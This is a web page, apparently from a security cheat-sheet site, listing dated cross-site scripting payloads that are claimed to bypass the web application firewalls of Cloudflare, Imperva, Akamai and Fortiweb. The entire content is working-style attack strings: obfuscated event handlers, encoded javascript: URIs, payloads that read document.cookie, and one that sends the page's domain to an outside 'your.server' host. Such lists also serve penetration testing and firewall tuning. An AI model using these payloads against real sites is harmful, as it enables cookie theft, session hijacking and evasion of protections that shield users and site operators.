pwny.cc
Search…
WAF Bypasses
The payloads are headed by the date of discovery of the bypass.

Cloudflare

1
//29-11-2021:
2
<img/src=x onError="`${x}`;alert(`XSS`);">
3
4
//26-11-2021:
5
-top['al\x65rt']('xss')-
6
7
//24-10-2021:
8
<svg onload=alert&#0000000040document.cookie)>
9
10
//06-10-2021:
11
";(a=alert,b=1,a(b))
12
13
//17-08-2021:
14
"<iframe src=j&#x61;vasc&#x72ipt&#x3a;alert&#x28;1&#x29; >"
15
16
//04-08-2021:
17
%27%09);%0d%0a%09%09[1].find(alert)//
18
19
//22-05-2021:
20
"><img%20src=x%20onmouseover=prompt%26%2300000000000000000040;document.cookie%26%2300000000000000000041;
21
22
//12-04-2021:
23
<svg/onload=location/**/='https://your.server/'+document.domain>
24
25
//25-02-2021:
26
<svg onx=() onload=(confirm)(1)>
27
28
//25-01-2021:
29
<svg/onrandom=random onload=confirm(1)>
30
31
//11-01-2021:
32
<svg onload=alert%26%230000000040"1")>
33
34
//23-12-2020:
35
<img%20id=%26%23x101;%20src=x%20onerror=%26%23x101;;alert`1`;>
Copied!

Imperva

1
//24-02-2021:
2
<a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />click
Copied!

Akamai

1
//28-09-2021:
2
"><a/\test="%26quot;x%26quot;"href='%01javascript:/*%b1*/;location.assign("//hackerone.com/stealthy?x="+location)'>Click
3
4
//13-12-2020:
5
<marquee+loop=1+width=0+onfinish='new+Function`al\ert\`1\``'>
6
7
//28-10-2018:
8
<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>
Copied!

Fortiweb

1
//09-07-2019:
2
\u003e\u003c\u0068\u0031 onclick=alert('1')\u003e
Copied!